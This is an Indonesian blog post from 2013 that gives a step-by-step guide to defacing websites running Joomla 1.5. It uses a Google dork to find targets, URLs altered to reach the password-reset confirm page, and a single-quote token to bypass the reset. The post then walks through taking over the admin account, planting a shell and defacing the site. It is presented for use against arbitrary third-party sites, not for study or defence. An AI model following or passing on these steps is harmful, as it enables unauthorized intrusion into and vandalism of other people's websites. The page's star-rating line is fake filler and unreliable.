Sabtu, 23 Maret 2013

Cara Deface Dengan Exploit Joomla V 1.5

بِسْــــــــــــــــمِ اﷲِالرَّحْمَنِ اارَّحِيم
cats

                     Kali ini kita targetkan joomla versi 1.5. Dengan menggunakan exploit berikut, kita bisa mereset sandi dari web tersebut dengan password yang kita inginkan. Tertarik? Simak dengan seksama.



1. Ketik dork berikut ke kotak pencarian google : inurl:option=com_user

2. Akan ada beberapa web disana. Buka salah satunya. Nanti web yang kita buka beralamatkan seperti ini :
http://site.com/index.php?option=com_user&view=reset
atau
http://site.com/index.php?option=com_user&view=login
atau
http://site.com/index.php?option=com_user&view=register
atau
http://site.com/index.php?option=com_user&view=remind

3. Sekarang, coba perhatikan view=reset, anda ganti tulisan itu dengan layout=confirm
Contoh : http://site.com/index.php?option=com_user&layout=confirm

4. Jika berhasil, akan muncul form token untuk mereset sandi dari web joomla tersebut. Isi saja kolom tokennya dengan tanda '

5. Jika berhasil, anda akan masuk ke menu reset password, nah isikan password baru yang kalian inginkan untuk login ke web tersebut nanti

6. Setelah proses reset sandi selesai, login ke web tersebut dengan username (admin) dan password baru anda melalui www.site.com/admin/ atau www.site.com/administrator/

7. Selesai, anda sudah masuk ke admin page web tersebut, tinggal otak atik aja webnya, tanemin shell lalu deface.
Share on :
Cara Deface Dengan Exploit Joomla V 1.5 9999out of 9999 based on 99999 ratings. 999 user reviews.

Artikel Terkait

Diposting oleh di 07.50
Label:

0   komentar

Posting Komentar

Cancel Reply
Langganan: Posting Komentar ( Atom )
Teguh Setyo Utomo